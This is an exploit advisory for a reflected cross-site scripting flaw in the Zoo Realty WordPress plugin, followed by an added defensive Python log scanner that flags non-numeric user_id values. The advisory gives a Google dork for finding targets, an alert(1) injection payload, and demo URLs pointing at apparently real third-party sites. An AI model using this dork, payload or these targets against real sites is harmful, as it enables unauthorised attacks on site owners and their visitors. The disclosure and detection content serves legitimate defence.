WordPress Zoo Realty Plugin Cross-Site Scripting Vulnerability
Posted on 07 October 2013
#############################
# Exploit Title : WordPress Zoo Realty Plugin Cross-Site Scripting Vulnerability
# Author : Ashiyane Digital Security Team
# Date : 2013/10/05
# Vendor Homepage : http://wordpress.org
# Google Dork : inurl:wp-content/plugins/Realty/display/elements/form_contact_agent.php
##############
# Location : site//wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=[xss]&popup=1
# Method : GET
# Script for Test : "/><script>alert(1);</script>
##############
# Demo:
# http://www.absXde.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
# http://www.aXm.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
# http://www.homeXnds.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
# http://www.newsXciesforsale.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
# http://www.planXoperties.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
###########################
# Discovered By : ACC3SS
###########################
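
Added example (not part of the original advisory and not the plugin's code): a log check a site owner can run to find requests to the script named above whose user_id is not a plain integer. It assumes common/combined access-log format and that a legitimate user_id is numeric; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path taken from the advisory's "Location" line.
VULN_PATH = "/wp-content/plugins/Realty/display/elements/form_contact_agent.php"

# Request part of a common/combined access-log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_user_ids(log_lines):
    """Return (line_number, decoded user_id) for requests to the plugin
    script whose user_id is not ASCII digits (assumed legitimate form)."""
    hits = []
    for lineno, line in enumerate(log_lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        # Collapse doubled slashes and lowercase so path variants still match,
        # including WordPress installed in a subdirectory.
        path = re.sub(r"/{2,}", "/", url.path).lower()
        if not path.endswith(VULN_PATH.lower()):
            continue
        # parse_qs percent-decodes values; keep_blank_values keeps "user_id=".
        values = parse_qs(url.query, keep_blank_values=True).get("user_id", [])
        for value in values:
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((lineno, value))
    return hits


# Constructed sample log lines (documentation IP ranges, no real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2013:10:12:01 +0000] "GET /wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=12&popup=1 HTTP/1.1" 200 2310',
    '198.51.100.23 - - [05/Oct/2013:10:12:09 +0000] "GET /wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 HTTP/1.1" 200 2388',
    '203.0.113.7 - - [05/Oct/2013:10:13:40 +0000] "GET /index.php?user_id=%3Cb%3E HTTP/1.1" 200 5120',
    '198.51.100.23 - - [05/Oct/2013:10:14:02 +0000] "GET /blog//wp-content/plugins/Realty/display/elements/form_contact_agent.php?popup=1&user_id=abc HTTP/1.1" 200 2290',
]

if __name__ == "__main__":
    for lineno, value in suspicious_user_ids(SAMPLE_LOG):
        print(f"line {lineno}: non-numeric user_id {value!r}")
```

A hit means the parameter carried something other than an integer, not that script ran in a browser; the fix remains validating user_id as an integer and HTML-escaping it on output in the plugin.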
